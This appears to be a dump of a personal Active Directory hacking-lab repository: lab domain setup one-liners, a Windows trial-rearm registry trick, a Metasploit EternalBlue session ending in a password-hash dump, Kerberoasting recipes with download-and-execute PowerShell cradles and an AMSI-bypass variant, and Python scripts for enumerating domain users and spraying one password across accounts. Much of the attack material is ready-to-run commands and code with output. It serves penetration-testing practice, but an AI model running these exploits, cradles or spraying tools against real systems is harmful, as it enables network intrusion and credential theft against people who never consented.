├── Static_IP ├── Server_2019_DC ├── Rearm_Windows_10.md ├── Server_2008_R2_VM_Tools ├── MS17-010 ├── Shares.md ├── Kerberoasting ├── Python_AD_Tooling.md ├── Active_Directory_Certificate_Service_ADCS.md └── Hack_Lab_Domain.md /Static_IP: -------------------------------------------------------------------------------- 1 | Note in VM InterfaceAlias are Ethernet0 2 | Note in VB InterfaceAlias are Ethernet 3 | 4 | You need to add your Chosen IP address, Default gateway IP address, DNS IP and Host name 5 | 6 | New-NetIPAddress –InterfaceAlias Ethernet0 –IPAddress Add-Your-Static-IP-Address –PrefixLength 24 -DefaultGateway Add-Your-Static-DG-IP-Address ; Set-DnsClientServerAddress -InterfaceAlias Ethernet0 -ServerAddresses Add-Your-Static-DNS-IP-Address,Add-Your-2nd-Static-DNS-IP-Address ; Rename-Computer -NewName "Add-Your-hostname" ; Restart-Computer 7 | -------------------------------------------------------------------------------- /Server_2019_DC: -------------------------------------------------------------------------------- 1 | A PS one-liner to convert your server 2019 into a lab DC. 2 | 3 | Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force ; Install-WindowsFeature AD-Domain-Services ; Import-Module ADDSDeployment ; Install-ADDSForest -DatabasePath "C:\Windows\NTDS" -DomainMode "Win2008R2" -DomainName "hacklab.local" -DomainNetbiosName "HACKLAB" -ForestMode "Win2008R2" -InstallDns:$true -LogPath "C:\Windows\NTDS" -NoRebootOnCompletion:$true -SysvolPath "C:\Windows\SYSVOL" -Force:$true ; Add-WindowsFeature RSAT-AD-Tools ; Restart-Computer 4 | -------------------------------------------------------------------------------- /Rearm_Windows_10.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | VM Rearm 4 | 5 | YOU CAN ONLY REARM WINDOWS 10!!!!! 6 | 7 | 8 | DOES NOT WORK FOR WIN 11 9 | 10 | CMD with admin privs 11 | 12 | 13 | See how many rearms you got left. 14 | 15 | ``` 16 | slmgr /dlv 17 | ``` 18 | 19 | Then to rearm 20 | 21 | ``` 22 | slmgr /rearm 23 | ``` 24 | 25 | 26 | 27 | After 90 days trial period expired, perform the following steps to get additional 240 days trial period. 28 | 29 | Press Windows key + R to open a Run box. 30 | 31 | Type 32 | ``` 33 | regedit 34 | ``` 35 | 36 | and press Enter to open the Registry Editor. If the UAC (User Account Control) prompt, click Yes to grant admin access. 37 | 38 | Navigate to the following location: 39 | ``` 40 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform 41 | ``` 42 | 43 | In the right pane, look for a dword 32-bit registry key called SkipRearm. 44 | 45 | Double-click on the SkipRearm registry key and change its value to 1. 46 | 47 | Restart your Windows and now you can reset the Windows OS trial period eight more times (8 × 30 days = 240 days) 48 | -------------------------------------------------------------------------------- /Server_2008_R2_VM_Tools: -------------------------------------------------------------------------------- 1 | The bundled VM tools with VM Workstation version 16X no longer support Server 2008 and fail during installation. 2 | 3 | Server 2008 R2 is end of life, and as such VM have stopped supporting it, I still use Server 2008 in my lab’s as it is still commonly used in the wild. 4 | 5 | The following is a work round, and for lab use only, it results in an older VM tools been installed. 6 | 7 | Spin up a copy of server 2008 R2 then enable admin accounts access to browse the internet. 8 | 9 | 1. Search for Server Manager / click on it to open 10 | 11 | 2. On the default Server Manger load page pull down and look for “Configure IE ESC” it’s to the right column under “Security Information” settings / click on it. 12 | 13 | 3. Under Administrators click off the setting to off / click OK. 14 | 15 | You should then be able to browse to https://packages.vmware.com/tools/releases/ and download an older VM manger which supports Server 2008 R2. 16 | 17 | Version used in my lab https://packages.vmware.com/tools/releases/10.3.5/windows/x64/VMware-tools-10.3.5-10430147-x86_64.exe 18 | 19 | 4. Download VMware-tools-10.3.5-10430147-x86_64.exe, right click on it and run as admin, this should then install VM tools on your Server 2008 R2. 20 | -------------------------------------------------------------------------------- /MS17-010: -------------------------------------------------------------------------------- 1 | 2 | Server version - Windows Server 2008 R2 Evaluation (180 days) 3 | 4 | https://www.microsoft.com/en-us/download/details.aspx?id=11093 5 | 6 | Verifying the version used for the lab 7 | 8 | PS C:\Users\LocalADM> (Get-WmiObject -class Win32_OperatingSystem).Caption 9 | Microsoft Windows Server 2008 R2 Datacenter 10 | 11 | PS C:\Users\LocalADM> [Environment]::OSVersion 12 | 13 | Platform ServicePack Version VersionString 14 | -------- ----------- ------- ------------- 15 | Win32NT Service Pack 1 6.1.7601.65536 Microsoft Windows NT 6.1.7... 16 | 17 | 18 | 19 | MSF 20 | 21 | msf5 > use exploit/windows/smb/ms17_010_eternalblue 22 | 23 | msf5 > set rhosts 192.168.99.100 24 | 25 | set lhost 192.168.99.20 26 | 27 | msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp 28 | 29 | msf5 exploit(windows/smb/ms17_010_eternalblue) > run -j 30 | 31 | [*] Started reverse TCP handler on 192.168.99.20:4444 32 | [*] 192.168.99.100:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check 33 | [+] 192.168.99.100:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit) 34 | [*] 192.168.99.100:445 - Scanned 1 of 1 hosts (100% complete) 35 | [*] 192.168.99.100:445 - Connecting to target for exploitation. 36 | [+] 192.168.99.100:445 - Connection established for exploitation. 37 | [+] 192.168.99.100:445 - Target OS selected valid for OS indicated by SMB reply 38 | [*] 192.168.99.100:445 - CORE raw buffer dump (53 bytes) 39 | [*] 192.168.99.100:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 40 | [*] 192.168.99.100:445 - 0x00000010 30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65 008 R2 Datacente 41 | [*] 192.168.99.100:445 - 0x00000020 72 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 r 7601 Service P 42 | [*] 192.168.99.100:445 - 0x00000030 61 63 6b 20 31 ack 1 43 | [+] 192.168.99.100:445 - Target arch selected valid for arch indicated by DCE/RPC reply 44 | [*] 192.168.99.100:445 - Trying exploit with 12 Groom Allocations. 45 | [*] 192.168.99.100:445 - Sending all but last fragment of exploit packet 46 | [*] 192.168.99.100:445 - Starting non-paged pool grooming 47 | [+] 192.168.99.100:445 - Sending SMBv2 buffers 48 | [+] 192.168.99.100:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. 49 | [*] 192.168.99.100:445 - Sending final SMBv2 buffers. 50 | [*] 192.168.99.100:445 - Sending last fragment of exploit packet! 51 | [*] 192.168.99.100:445 - Receiving response from exploit packet 52 | [+] 192.168.99.100:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! 53 | [*] 192.168.99.100:445 - Sending egg to corrupted connection. 54 | [*] 192.168.99.100:445 - Triggering free of corrupted buffer. 55 | [*] Sending stage (206403 bytes) to 192.168.99.100 56 | [*] Meterpreter session 2 opened (192.168.99.20:4444 -> 192.168.99.100:49199) at 1948-01-15 01:06:58 +0000 57 | [+] 192.168.99.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 58 | [+] 192.168.99.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 59 | [+] 192.168.99.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 60 | 61 | 62 | meterpreter > getsystem 63 | ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). 64 | 65 | meterpreter > hashdump 66 | Administrator:500:aad3b435b51404eeaad3b477751404ee:fc525c9683e8fe0670957777971889::: 67 | -------------------------------------------------------------------------------- /Shares.md: -------------------------------------------------------------------------------- 1 | A draft PowerShell one-liner to create shares on a server, open PowerShell with admin privileges and copy and paste the below line. 2 | 3 | ``` 4 | New-Item -Path "C:\files" -ItemType Directory -Force; Set-Content -Path "C:\files\readme.txt" -Value "happy golf fish password"; New-Item -Path "C:\files\happy" -ItemType Directory -Force; Set-Content -Path "C:\files\happy\sun.txt" -Value "happy clap golf password"; New-SmbShare -Name "files" -Path "C:\files" -FullAccess "Everyone"; Grant-SmbShareAccess -Name "files" -AccountName "Domain Users" -AccessRight Read -Force 5 | 6 | ``` 7 | 8 | This is the response you should see. 9 | 10 | ``` 11 | PS C:\Windows\system32> New-Item -Path "C:\files" -ItemType Directory -Force; Set-Content -Path "C:\files\readme.txt" -Value "happy golf fish password"; New-Item -Path "C:\files\happy" -ItemType Directory -Force; Set-Content -Path "C:\files\happy\sun.txt" -Value "happy clap golf password"; New-SmbShare -Name "files" -Path "C:\files" -FullAccess "Everyone"; Grant-SmbShareAccess -Name "files" -AccountName "Domain Users" -AccessRight Read -Force 12 | 13 | 14 | Directory: C:\ 15 | 16 | 17 | Mode LastWriteTime Length Name 18 | ---- ------------- ------ ---- 19 | d----- 28/11/2024 12:47 files 20 | 21 | 22 | Directory: C:\files 23 | 24 | 25 | Mode LastWriteTime Length Name 26 | ---- ------------- ------ ---- 27 | d----- 28/11/2024 12:47 happy 28 | 29 | AvailabilityType : NonClustered 30 | CachingMode : Manual 31 | CATimeout : 0 32 | CompressData : False 33 | ConcurrentUserLimit : 0 34 | ContinuouslyAvailable : False 35 | CurrentUsers : 0 36 | Description : 37 | EncryptData : False 38 | FolderEnumerationMode : Unrestricted 39 | IdentityRemoting : False 40 | Infrastructure : False 41 | LeasingMode : Full 42 | Name : files 43 | Path : C:\files 44 | Scoped : False 45 | ScopeName : * 46 | SecurityDescriptor : O:SYG:SYD:(A;;FA;;;WD) 47 | ShadowCopy : False 48 | ShareState : Online 49 | ShareType : FileSystemDirectory 50 | SmbInstance : Default 51 | Special : False 52 | Temporary : False 53 | Volume : \\?\Volume{677a5d74-680b-4c27-87bd-20b4f085a124}\ 54 | PSComputerName : 55 | PresetPathAcl : System.Security.AccessControl.DirectorySecurity 56 | 57 | 58 | AccessControlType : Allow 59 | AccessRight : Full 60 | AccountName : Everyone 61 | Name : files 62 | ScopeName : * 63 | PSComputerName : 64 | 65 | 66 | AccessControlType : Allow 67 | AccessRight : Read 68 | AccountName : HACKLAB\Domain Users 69 | Name : files 70 | ScopeName : * 71 | PSComputerName : 72 | 73 | 74 | 75 | PS C:\Windows\system32> 76 | 77 | ``` 78 | 79 | Mounting from a remote host using an account belonging to the domain users group. 80 | 81 | ``` 82 | C:\Users\g.white>pushd \\WIN-5EP48R94F9D\files 83 | 84 | Z:\>dir 85 | Volume in drive Z has no label. 86 | Volume Serial Number is AA05-C96A 87 | 88 | Directory of Z:\ 89 | 90 | 28/11/2024 20:47 . 91 | 28/11/2024 20:47 happy 92 | 28/11/2024 20:47 26 readme.txt 93 | 1 File(s) 26 bytes 94 | 2 Dir(s) 49,526,321,152 bytes free 95 | 96 | Z:\> 97 | 98 | ``` 99 | 100 | Hunting for defined words within the documents across the shares folders. Read this for more info on this method (https://github.com/myexploit/Hunt). 101 | 102 | ``` 103 | Z:\>findstr /si password *.bat *.xml *.ini *.txt 104 | happy\sun.txt:happy clap golf password 105 | readme.txt:happy golf fish password 106 | 107 | Z:\> 108 | 109 | ``` 110 | 111 | Once I get more time I will add a load of vulnerable shares to my https://github.com/myexploit/LAB/blob/master/Hack_Lab_Domain.md script, so you can enumerate for common words across an exposed network share. 112 | -------------------------------------------------------------------------------- /Kerberoasting: -------------------------------------------------------------------------------- 1 | The following details how to set up Kerberoasting in your own windows lab. 2 | 3 | ------------------------------- 4 | 5 | Add users and create SPN for them 6 | 7 | net user DA Passw0rd! /ADD /DOMAIN 8 | net user User1 Passw0rd! /ADD /DOMAIN 9 | net group "Domain Admins" DA /add 10 | setspn -s http/server1.hacklab.local:8080 DA 11 | setspn -s http/server1.hacklab.local:8081 User1 12 | 13 | ------------------------------- 14 | 15 | Delete users and assigned SPN 16 | 17 | setspn -d http/server1.hacklab.local:8080 DA 18 | setspn -d http/server1.hacklab.local:8081 User1 19 | net user DA /DELETE /DOMAIN 20 | net user User1 /DELETE /DOMAIN 21 | 22 | ------------------------------- 23 | 24 | See all the assigned SPN for a defined user 25 | 26 | setspn -L hacklab.local\service1 27 | 28 | Registered ServicePrincipalNames for CN=service1,CN=Users,DC=hacklab,DC=local: 29 | mssql/hacklab.local:80 30 | http/hacklab.local:80 31 | 32 | ------------------------------- 33 | 34 | Power Shell one liner to find all SPN tests all domain users 35 | 36 | cls ; $search = New-Object DirectoryServices.DirectorySearcher([ADSI]“”) ; $search.filter = “(servicePrincipalName=*)” ; $results = $search.Findall() ; foreach($result in $results) { $userEntry = $result.GetDirectoryEntry() ; Write-host “Object Name = “ $userEntry.name -backgroundcolor “yellow” -foregroundcolor “black” ; Write-host “DN = “ $userEntry.distinguishedName ; Write-host “Object Cat. = “ $userEntry.objectCategory ; Write-host “servicePrincipalNames” ; $i=1 ; foreach($SPN in $userEntry.servicePrincipalName) { ; Write-host “SPN(“ $i “) = “ $SPN ; $i+=1 } ; Write-host “” } 37 | 38 | ------------------------------- 39 | 40 | How to run Kerberoasting with Power Shell 41 | 42 | Runs and closes PS -w 1 43 | 44 | powershell -w 1 -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/myexploit/PS_Scripts_Backup/master/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt" 45 | 46 | ------------------------------- 47 | 48 | Without closing the PS session 49 | 50 | powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/myexploit/PS_Scripts_Backup/master/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt" 51 | 52 | ------------------------------- 53 | 54 | AMSI bypass works 05/06/2019 - Mohammed Danish https://medium.com/@gamer.skullie/bypassing-amsi-with-an-unconventional-powershell-cradle-6bd15a17d8b9 55 | 56 | $webreq = [System.Net.WebRequest]::Create(‘https://raw.githubusercontent.com/myexploit/PS_Scripts_Backup/master/Invoke-Kerberoast.ps1’); $resp=$webreq.GetResponse(); $respstream=$resp.GetResponseStream(); $reader=[System.IO.StreamReader]::new($respstream); $content=$reader.ReadToEnd(); IEX($content); Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt 57 | 58 | ------------------------------- 59 | 60 | How to load .ps1 locally 61 | 62 | powershell -ep bypass 63 | Import-module .\Invoke-Kerberoast.ps1 ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt 64 | 65 | ------------------------------- 66 | 67 | How to run Kerberoasting with C# 68 | 69 | https://github.com/GhostPack/Rubeus 70 | 71 | Rubeus.exe kerberoast /format:hashcat 72 | 73 | ------------------------------- 74 | 75 | How to run Kerberoasting with impacket using Kali 76 | 77 | In Kali add a static DNS entry for the full domain the IP should point at the DC 78 | 79 | gedit /etc/hosts 80 | 81 | Make sure you can ping the full domain. 82 | 83 | ./GetUserSPNs.py -request Add-Full-Domain-Name/Add-User-Name 84 | 85 | If it can connect to the DC it will prompt for a password. 86 | 87 | ------------------------------- 88 | 89 | How to reverse hashes collected from Kerberoasting 90 | 91 | hashcat64.exe -m 13100 "hash" "wordlist" --outfile="filename" 92 | 93 | hashcat64.exe -m 13100 "C:\Users\YepYepYep\Desktop\Kerb1" C:\Users\YepYepYep\Documents\Wordlists\Rocktastic12a --outfile="C:\Users\YepYepYep\Desktop\Kerb1CrackedKerb-Hashes1.txt" 94 | -------------------------------------------------------------------------------- /Python_AD_Tooling.md: -------------------------------------------------------------------------------- 1 | These are draft scripts I’m just toying with. 2 | 3 | 4 | **Domain User account enumeration - authenticates with AD then dumps a copy of all domain usernames** 5 | 6 | Save the below as AD-Test99.py 7 | 8 | ``` 9 | import argparse 10 | from ldap3 import Server, Connection, ALL, SUBTREE, core 11 | from ldap3.core.exceptions import LDAPException 12 | 13 | def authenticate(username, domain, password, domain_controller): 14 | user_dn = f"{username}@{domain}" 15 | server = Server(domain_controller, get_info=ALL) 16 | 17 | try: 18 | conn = Connection(server, user=user_dn, password=password, auto_bind=True) 19 | if conn.bind(): 20 | print("Authentication successful") 21 | return conn 22 | else: 23 | print("Authentication failed") 24 | return None 25 | except LDAPException as e: 26 | print(f"LDAPException: {e}") 27 | print("Invalid credentials. Authentication failed.") 28 | return None 29 | 30 | def get_all_usernames(conn, search_base): 31 | page_size = 1000 32 | cookie = None 33 | usernames = [] 34 | 35 | while True: 36 | conn.search( 37 | search_base, 38 | '(objectClass=user)', 39 | attributes=['sAMAccountName'], 40 | paged_size=page_size, 41 | paged_cookie=cookie 42 | ) 43 | 44 | if conn.entries: 45 | for entry in conn.entries: 46 | usernames.append(entry.sAMAccountName.value) 47 | 48 | cookie = conn.result['controls']['1.2.840.113556.1.4.319']['value']['cookie'] 49 | 50 | if not cookie: 51 | break 52 | 53 | if usernames: 54 | print("List of usernames:") 55 | for username in usernames: 56 | print(username) 57 | else: 58 | print("No users found or unable to retrieve user list.") 59 | 60 | if __name__ == "__main__": 61 | parser = argparse.ArgumentParser(description="Authenticate and optionally list AD users") 62 | parser.add_argument("-u", "--username", required=True, help="Username") 63 | parser.add_argument("-p", "--password", required=True, help="Password") 64 | parser.add_argument("-d", "--domain", required=True, help="Domain") 65 | parser.add_argument("-dc", "--domain_controller", required=True, help="Domain Controller Hostname") 66 | parser.add_argument("-UN", "--usernames", action="store_true", help="Enumerate and display all domain usernames") 67 | 68 | args = parser.parse_args() 69 | 70 | conn = authenticate(args.username, args.domain, args.password, args.domain_controller) 71 | 72 | if conn and args.usernames: 73 | search_base = f"dc={args.domain.replace('.', ',dc=')}" 74 | get_all_usernames(conn, search_base) 75 | conn.unbind() 76 | 77 | ``` 78 | 79 | **Demo Domain User account enumeration** 80 | 81 | ``` 82 | ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ python3 AD-Test99.py -u g.white -p 'Passw0rd!' -d hacklab.local -dc WIN-8HPLF8PSHC1.hacklab.local -UN 83 | Authentication successful 84 | List of usernames: 85 | Administrator 86 | Guest 87 | WIN-8HPLF8PSHC1$ 88 | krbtgt 89 | da1 90 | n.collins 91 | o.davidson 92 | p.davies 93 | q.dawson 94 | u.dixon 95 | r.edwards 96 | s.elliot 97 | t.evans 98 | u.fisher 99 | v.fletcher 100 | w.ford 101 | x.foster 102 | y.fox 103 | z.gibson 104 | a.graham 105 | b.grant 106 | c.gray 107 | d.green 108 | b.smith 109 | c.johnason 110 | d.thomas 111 | e.miller 112 | f.johnsson 113 | g.williams 114 | t.harris 115 | i.jackson 116 | t.wilsson 117 | k.mmoore 118 | l.martsinez 119 | m.marjtinez 120 | n.anderson 121 | o.thompson 122 | p.thompson 123 | q.lewis 124 | r.robinson 125 | s.sancshez 126 | t.clark 127 | u.hernandez 128 | v.hill 129 | w.king 130 | x.rossi 131 | y.darrdvis 132 | z.perez 133 | a.white 134 | b.jackson 135 | c.smith 136 | d.taylor 137 | e.martin 138 | f.thoffmas 139 | g.hernandez 140 | h.rodrgviguez 141 | i.johncson 142 | j.miller 143 | k.jones 144 | l.davsris 145 | m.andessrson 146 | y.johnfson 147 | o.mooore 148 | p.clark 149 | q.thomdas 150 | r.martianez 151 | s.wiloson 152 | t.robinson 153 | u.marteinez 154 | v.sancahez 155 | w.moorre 156 | x.thompson 157 | y.martsinez 158 | z.hernandez 159 | a.miller 160 | b.rodriseguez 161 | c.anderson 162 | d.sancahez 163 | e.wilison 164 | f.davrtsis 165 | g.mooree 166 | h.thomddfas 167 | z.johnsson 168 | j.martainez 169 | k.rodrigfduez 170 | l.sanchdez 171 | m.clark 172 | n.davdemis 173 | o.wilwson 174 | p.robinson 175 | q.hernandez 176 | r.martiynez 177 | s.anderson 178 | t.johnsron 179 | u.rodrigkjuez 180 | v.sancghez 181 | w.wilsaon 182 | x.davifis 183 | y.moossre 184 | z.thomssas 185 | a.martinuez 186 | b.hernandez 187 | c.robinson 188 | d.clark 189 | e.jodhnson 190 | f.sanwchez 191 | g.wilpson 192 | h.davxris 193 | i.moofrre 194 | j.massrtainez 195 | k.rodrijguez 196 | l.sancahez 197 | m.anderson 198 | n.johnsson 199 | o.martiwnez 200 | p.hernandez 201 | q.wiloson 202 | r.davirws 203 | s.moewore 204 | t.thoweermas 205 | u.johnslon 206 | v.martienez 207 | w.rodrisguez 208 | x.sanchgez 209 | y.wilison 210 | z.davsdis 211 | a.clark 212 | b.johndson 213 | c.martiwnez 214 | d.rodrigruez 215 | e.sanchjez 216 | f.wilyson 217 | g.davioos 218 | h.mooeere 219 | i.thomas 220 | j.johnhson 221 | k.martiunez 222 | l.rodrigiuez 223 | m.sanychez 224 | n.wiwlson 225 | o.daviuus 226 | p.moorrre 227 | q.thdddomas 228 | r.johntson 229 | s.marttinez 230 | t.rodrieguez 231 | u.sancrhez 232 | v.wilsion 233 | w.davccis 234 | x.moowsxre 235 | y.thomeeeas 236 | z.johnqson 237 | a.martwinez 238 | b.rodrigutuez 239 | c.sanczhez 240 | d.wilsuion 241 | e.daerfvis 242 | f.mooure 243 | g.thomeeeas 244 | h.johnsson 245 | i.martinwez 246 | j.rodrwyiguez 247 | k.sanchiez 248 | l.wilyson 249 | m.davssis 250 | n.moorcre 251 | o.thomderas 252 | p.johnsson 253 | q.maratinez 254 | r.rodrieyguez 255 | s.sancyhez 256 | t.wilseon 257 | u.daytvis 258 | v.mocdore 259 | w.thomattts 260 | x.johnsaon 261 | y.martihnez 262 | z.rodrirtguez 263 | a.sanchtez 264 | b.wilswon 265 | c.davyis 266 | d.moodsre 267 | e.thomfffas 268 | f.johnso 269 | g.martinjez 270 | h.rodrigwuez 271 | i.sancohez 272 | j.wilesosn 273 | k.dawerris 274 | l.moouiyre 275 | m.thogghmas 276 | n.johseeson 277 | o.martidnez 278 | p.rodrasiguez 279 | q.sanchpez 280 | r.wilsson 281 | s.daveeris 282 | t.moodce 283 | u.thomhhas 284 | v.jhnson 285 | w.martfinez 286 | x.rodrifguez 287 | y.sancuhez 288 | z.wilsaon 289 | a.davihhuus 290 | b.mootfre 291 | c.thomhhsas 292 | d.johnsaon 293 | e.martidfnez 294 | f.rodridfguez 295 | g.sancthez 296 | h.wilzson 297 | i.davffis 298 | j.moodckre 299 | k.thomeweas 300 | l.johnon 301 | m.martiynez 302 | n.rodrsiguez 303 | o.sanrchez 304 | p.wiltson 305 | q.davfwfis 306 | r.mooyre 307 | m.jenkins 308 | n.johnson 309 | o.jones 310 | g.white 311 | h.yalden 312 | i.yarbury 313 | j.yardley 314 | z.mcdonald 315 | a.murphy 316 | b.natt 317 | c.nelson 318 | d.nightingale 319 | e.nixon 320 | f.nutter 321 | p.kelly 322 | q.kennedy 323 | u.king 324 | r.knight 325 | s.lawrence 326 | t.lee 327 | u.lewis 328 | v.lloyd 329 | w.marshall 330 | x.martin 331 | y.mason 332 | g.dell 333 | h.osborne 334 | i.owen 335 | j.oxley 336 | k.page 337 | l.painter 338 | m.palmer 339 | n.pastor 340 | o.peterson 341 | p.quill 342 | q.quimby 343 | u.quintrell 344 | r.ramsey 345 | s.ratliff 346 | t.richards 347 | u.roberts 348 | v.robinson 349 | w.scott 350 | x.simpson 351 | y.smith 352 | z.stewart 353 | a.taylor 354 | b.turner 355 | c.walsh 356 | d.ward 357 | e.webb 358 | f.west 359 | d.atkinson 360 | e.bailey 361 | f.baker 362 | g.ball 363 | h.bell 364 | i.brown 365 | j.burton 366 | k.carter 367 | l.clarke 368 | m.cole 369 | e.griffiths 370 | f.hall 371 | g.hamilton 372 | h.harris 373 | i.harvey 374 | j.hill 375 | k.jackson 376 | l.james 377 | k.yarrow 378 | l.yates 379 | m.young 380 | n.zachary 381 | o.zelly 382 | p.zinc 383 | q.zouch 384 | a.adams 385 | b.allen 386 | c.armstrong 387 | adm.adams 388 | adm.smith 389 | adm.stewart 390 | adm.natt 391 | adm.nelson 392 | svc_afds 393 | svc_test 394 | svc_mssql1 395 | svc_mssql2 396 | svc_lab 397 | svc_admin 398 | SR2000-1$ 399 | SR2000-2$ 400 | SR2000-3$ 401 | SR2000-4$ 402 | SR2000-5$ 403 | SR2000-6$ 404 | SR2003-1$ 405 | SR2003-2$ 406 | SR2003-3$ 407 | SR2003-4$ 408 | SR2003-5$ 409 | SR2003-6$ 410 | SR208-1$ 411 | SR208-2$ 412 | SR208-3$ 413 | SR208-4$ 414 | SR208-5$ 415 | SR208-6$ 416 | SR2012-1$ 417 | SR2012-2$ 418 | SR2012-3$ 419 | SR2012-4$ 420 | SR2019-1$ 421 | SR2019-2$ 422 | SR2019-3$ 423 | SR2019-4$ 424 | W7-1$ 425 | W7-2$ 426 | W7-3$ 427 | W7-4$ 428 | W7-5$ 429 | W7-6$ 430 | XP-1$ 431 | WIN-10-LAB$ 432 | WIN-10-LAB-2$ 433 | Tom_ADM 434 | kay1 435 | ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ 436 | ``` 437 | 438 | **Domain credential stuffing script** 439 | 440 | This script needs ldap3 441 | 442 | ``` 443 | pip install ldap3 444 | ``` 445 | 446 | Save the below as AD_Creds.py 447 | 448 | ``` 449 | import argparse 450 | from ldap3 import Server, Connection, ALL, SUBTREE, core 451 | from ldap3.core.exceptions import LDAPException 452 | 453 | def authenticate(username, domain, password, domain_controller): 454 | user_dn = f"{username}@{domain}" 455 | server = Server(domain_controller, get_info=ALL) 456 | 457 | try: 458 | conn = Connection(server, user=user_dn, password=password, auto_bind=True) 459 | if conn.bind(): 460 | return True 461 | else: 462 | return False 463 | except LDAPException: 464 | return False 465 | 466 | if __name__ == "__main__": 467 | parser = argparse.ArgumentParser(description="Authenticate and check AD users") 468 | parser.add_argument("-u", "--usernames", nargs="+", required=True, help="One or more usernames to check") 469 | parser.add_argument("-p", "--password", required=True, help="Password") 470 | parser.add_argument("-d", "--domain", required=True, help="Domain") 471 | parser.add_argument("-dc", "--domain_controller", required=True, help="Domain Controller Hostname") 472 | 473 | args = parser.parse_args() 474 | 475 | for username in args.usernames: 476 | if authenticate(username, args.domain, args.password, args.domain_controller): 477 | print(f"Accepted: {username}") 478 | else: 479 | print(f"Rejected: {username}") 480 | ``` 481 | 482 | **Demo using the Domain credential stuffing script** 483 | 484 | python3 AD_Creds.py -u Add-Username -p 'Add-Password' -d Add-Domain -dc Add-DC-Host-Name-or-IP-Address 485 | 486 | ``` 487 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ python3 AD_Creds.py -u Administrator Guest WIN-8HPLF8PSHC1$ krbtgt da1 n.collins o.davidson p.davies q.dawson u.dixon r.edwards s.elliot t.evans u.fisher v.fletcher w.ford x.foster y.fox z.gibson a.graham b.grant c.gray d.green b.smith c.johnason d.thomas e.miller f.johnsson g.williams t.harris i.jackson t.wilsson k.mmoore l.martsinez m.marjtinez n.anderson o.thompson p.thompson q.lewis r.robinson s.sancshez t.clark u.hernandez v.hill w.king x.rossi y.darrdvis z.perez a.white b.jackson c.smith d.taylor e.martin f.thoffmas g.hernandez h.rodrgviguez i.johncson j.miller k.jones l.davsris m.andessrson y.johnfson o.mooore p.clark q.thomdas r.martianez s.wiloson t.robinson u.marteinez v.sancahez w.moorre x.thompson y.martsinez z.hernandez a.miller b.rodriseguez c.anderson d.sancahez e.wilison f.davrtsis g.mooree h.thomddfas z.johnsson j.martainez k.rodrigfduez l.sanchdez m.clark n.davdemis o.wilwson p.robinson q.hernandez r.martiynez s.anderson t.johnsron u.rodrigkjuez v.sancghez w.wilsaon x.davifis y.moossre z.thomssas a.martinuez b.hernandez c.robinson d.clark e.jodhnson f.sanwchez g.wilpson h.davxris i.moofrre j.massrtainez k.rodrijguez l.sancahez m.anderson n.johnsson o.martiwnez p.hernandez q.wiloson r.davirws s.moewore t.thoweermas u.johnslon v.martienez w.rodrisguez x.sanchgez y.wilison z.davsdis a.clark b.johndson c.martiwnez d.rodrigruez e.sanchjez f.wilyson g.davioos h.mooeere i.thomas j.johnhson k.martiunez l.rodrigiuez m.sanychez n.wiwlson o.daviuus p.moorrre q.thdddomas r.johntson s.marttinez t.rodrieguez u.sancrhez v.wilsion w.davccis x.moowsxre y.thomeeeas z.johnqson a.martwinez b.rodrigutuez c.sanczhez d.wilsuion e.daerfvis f.mooure g.thomeeeas h.johnsson i.martinwez j.rodrwyiguez k.sanchiez l.wilyson m.davssis n.moorcre o.thomderas p.johnsson q.maratinez r.rodrieyguez s.sancyhez t.wilseon u.daytvis v.mocdore w.thomattts x.johnsaon y.martihnez z.rodrirtguez a.sanchtez b.wilswon c.davyis d.moodsre e.thomfffas f.johnso g.martinjez h.rodrigwuez i.sancohez j.wilesosn k.dawerris l.moouiyre m.thogghmas n.johseeson o.martidnez p.rodrasiguez q.sanchpez r.wilsson s.daveeris t.moodce u.thomhhas v.jhnson w.martfinez x.rodrifguez y.sancuhez z.wilsaon a.davihhuus b.mootfre c.thomhhsas d.johnsaon e.martidfnez f.rodridfguez g.sancthez h.wilzson i.davffis j.moodckre k.thomeweas l.johnon m.martiynez n.rodrsiguez o.sanrchez p.wiltson q.davfwfis r.mooyre m.jenkins n.johnson o.jones g.white h.yalden i.yarbury j.yardley z.mcdonald a.murphy b.natt c.nelson d.nightingale e.nixon f.nutter p.kelly q.kennedy u.king r.knight s.lawrence t.lee u.lewis v.lloyd w.marshall x.martin y.mason g.dell h.osborne i.owen j.oxley k.page l.painter m.palmer n.pastor o.peterson p.quill q.quimby u.quintrell r.ramsey s.ratliff t.richards u.roberts v.robinson w.scott x.simpson y.smith z.stewart 